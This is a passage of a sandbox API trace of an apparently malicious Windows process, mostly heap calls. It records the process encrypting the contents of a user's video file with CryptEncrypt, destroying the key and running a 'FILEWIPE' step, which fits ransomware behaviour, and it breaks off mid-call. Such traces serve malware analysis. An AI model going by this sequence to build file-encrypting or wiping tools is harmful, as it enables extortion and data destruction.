0x9bd930 [0199.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0199.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0199.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0199.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0199.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0199.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0199.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0199.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0199.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0199.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0199.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0199.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0199.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0199.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0199.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0199.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0199.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0199.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0199.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0199.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0199.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0199.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0199.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0199.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0199.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0199.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0199.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0199.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0199.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0199.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0199.271] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0199.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0199.271] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c26d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0199.271] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.272] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.272] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.272] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.272] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.272] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.272] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.272] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.272] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0199.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0199.272] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.272] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0199.272] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.272] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.272] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.272] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0199.272] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.272] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0199.273] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0199.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.274] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xa550, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xa560) returned 1 [0199.274] CharLowerBuffW (in: lpsz="byte[42337]", cchLength=0xb | out: lpsz="byte[42337]") returned 0xb [0199.276] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.276] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.276] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa550, dwBufLen=0xa560 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa560) returned 1 [0199.278] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0199.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.278] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.278] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.302] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0199.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.302] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.302] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.302] CryptDestroyKey (hKey=0x90af98) returned 1 [0199.303] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0199.303] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0199.303] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.303] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0199.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.303] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.303] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.303] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.303] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0199.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.304] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.304] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0199.304] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.304] FreeLibrary (hLibModule=0x74f20000) returned 1 [0199.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0199.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0199.305] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0199.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0199.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.306] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20431190, ftCreationTime.dwHighDateTime=0x1d5e066, ftLastAccessTime.dwLowDateTime=0x98709d60, ftLastAccessTime.dwHighDateTime=0x1d5dac4, ftLastWriteTime.dwLowDateTime=0x98709d60, ftLastWriteTime.dwHighDateTime=0x1d5dac4, nFileSizeHigh=0x0, nFileSizeLow=0xa550, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="c2l5D8zFcQaFr.mp4", cAlternateFileName="C2L5D8~1.MP4")) returned 0x90ae18 [0199.306] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0199.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0199.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0199.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0199.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.306] CharLowerBuffW (in: lpsz="byte[42320]", cchLength=0xb | out: lpsz="byte[42320]") returned 0xb [0199.306] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0199.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.307] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0199.307] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0199.307] FreeLibrary (hLibModule=0x75c90000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0199.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0199.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0199.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0199.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0199.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0199.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0199.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0199.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0199.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0199.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.308] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0199.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0199.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.308] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0199.308] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.308] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 